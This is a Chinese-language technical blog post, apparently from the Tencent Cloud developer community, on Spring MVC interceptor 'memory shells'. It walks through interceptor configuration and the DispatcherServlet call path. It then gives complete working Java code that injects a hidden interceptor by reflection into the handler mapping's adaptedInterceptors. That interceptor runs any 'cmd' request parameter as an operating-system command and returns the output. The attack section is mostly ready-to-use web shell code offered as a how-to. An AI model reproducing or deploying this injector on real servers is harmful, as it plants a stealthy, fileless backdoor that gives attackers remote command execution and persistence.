interceptor内存马详解
原创
interceptor基础
配置springmvc-servlet.xml
<?xml version="1.0" encoding="UTF-8"?>
<beans
xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:context="http://www.springframework.org/schema/context"
xmlns:mvc="http://www.springframework.org/schema/mvc"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd
http://www.springframework.org/schema/context
https://www.springframework.org/schema/context/spring-context.xsd
http://www.springframework.org/schema/mvc
https://www.springframework.org/schema/mvc/spring-mvc.xsd">
<!-- 自动扫描包,让指定包下的注解生效,由IOC容器统一管理 -->
<context:component-scan base-package="com.naihe.controller"/>
<!-- 让Spring MVC不处理静态资源 -->
<mvc:default-servlet-handler />
<!-- 支持mvc注解驱动 在spring中一般采用@RequestMapping注解来完成映射关系
要想使@RequestMapping注解生效
必须向上下文中注册DefaultAnnotationHandlerMapping
和一个AnnotationMethodHandlerAdapter实例
这两个实例分别在类级别和方法级别处理。
而annotation-driven配置帮助我们自动完成上述两个实例的注入。 -->
<mvc:annotation-driven />
<!-- 视图解析器 -->
<bean id="/ModelAndViewTest" class="com.naihe.controller.ModelAndViewTest"></bean>
<bean id="/t1" class="com.naihe.controller.HelloController2"></bean>
<bean id="/mav" class="com.naihe.controller.Mav"/>
<bean class="org.springframework.web.servlet.view.InternalResourceViewResolver " id="internalResourceViewResolver">
<!-- 前缀 --> <property name="prefix" value="/WEB-INF/jsp/"/>
<!-- 后缀 -->
<property name="suffix" value=".jsp" />
</bean>
<mvc:interceptors>
<mvc:interceptor>
<!-- 配置拦截器拦截路径-->
<mvc:mapping path="/demo/*"/>
<!-- 注入自定义拦截器-->
<bean class="com.naihe.Interceptor.MyInterceptor"/>
</mvc:interceptor>
</mvc:interceptors>
</beans>Demo
package com.naihe.Interceptor;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
public class MyInterceptor implements HandlerInterceptor {
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
System.out.println("拦截器执行");
request.getRequestDispatcher("/WEB-INF/pages/error.jsp").forward(request,response);
return true;
}
public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
System.out.println("控制器执行后执行");
}
public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
System.out.println("jsp页面执行后执行");
}
}hello
这里是后面内存马需要的可访问的页面
package com.naihe.controller;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.PathVariable;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
@Controller
public class hello {
@ResponseBody
@RequestMapping("/cl1")
public String hello(String name, Model model){
model.addAttribute("msg",name);
return "hello";
}
}
流程分析
Interceptor调用
在org.springframework.web.servlet.DispatcherServlet的doDispatch方法下断点
后面会调用mappedHandler.applyPreHandle方法
这里遍历使用的interceptors,并调用其preHandle方法,
添加Interceptor
进入getHandler方法,这里主要是获取Interceptor
进入gethandler
进入getHandlerExecutionChain
这里可以看到将Interceptor遍历出来,在添加到chain
在这里可以看到所有的监听器
在这里观察一下数据结构,发现是MappedInterceptor中包含了url地址和自定义拦截器的实例对象
需要反射创建一个MappedInterceptor对象,并添加上我们的interceptor类和includePatterns
这里判断了访问地址和Interceptor地址是否符合要去,如果不符合的话就不会加载
内存马
package com.naihe.controller;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.servlet.HandlerInterceptor;
import org.springframework.web.servlet.ModelAndView;
import org.springframework.web.servlet.handler.MappedInterceptor;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
@Controller
public class TestInterceptor{
@ResponseBody
@RequestMapping(value = "/interceptor", method = RequestMethod.GET)
public String inject() throws NoSuchMethodException, NoSuchFieldException, IllegalAccessException {
try{
// 获取context
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
// 从context中获取AbstractHandlerMapping的实例对象
org.springframework.web.servlet.handler.AbstractHandlerMapping abstractHandlerMapping = (org.springframework.web.servlet.handler.AbstractHandlerMapping)context.getBean("org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping");
// 反射获取adaptedInterceptors属性
java.lang.reflect.Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
field.setAccessible(true);
java.util.ArrayList<HandlerInterceptor> adaptedInterceptors = (java.util.ArrayList<HandlerInterceptor>)field.get(abstractHandlerMapping);
//生成一个MappedInterceptor对象
MappedInterceptor mappedInterceptor = new MappedInterceptor(new String[]{"/cl1"},null,new InterceptorDemo());
// 添加到adaptedInterceptors中
adaptedInterceptors.add(mappedInterceptor); // 添加全局interceptor
return "ok";
} catch (Exception e) {
return "no";
}
}
}
class InterceptorDemo implements HandlerInterceptor {
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
InputStream is = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
InputStreamReader isr = new InputStreamReader(is, "UTF-8");
BufferedReader br = new BufferedReader(isr);
String str = "";
String line = "";
while ((line = br.readLine())!=null){
str+=line;
}
is.close();
br.close();
response.getWriter().write(str);
return false;
}
public void postHandle(HttpServletRequest request, HttpServletResponse response, Object handler, ModelAndView modelAndView) throws Exception {
}
public void afterCompletion(HttpServletRequest request, HttpServletResponse response, Object handler, Exception ex) throws Exception {
}
}效果
访问cl1,注意在这里cl1是必须存在的,前面给了源码
访问一个普通页面,并传参
访问注入界面,注入内存马
再次访问之前的页面
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
腾讯云开发者
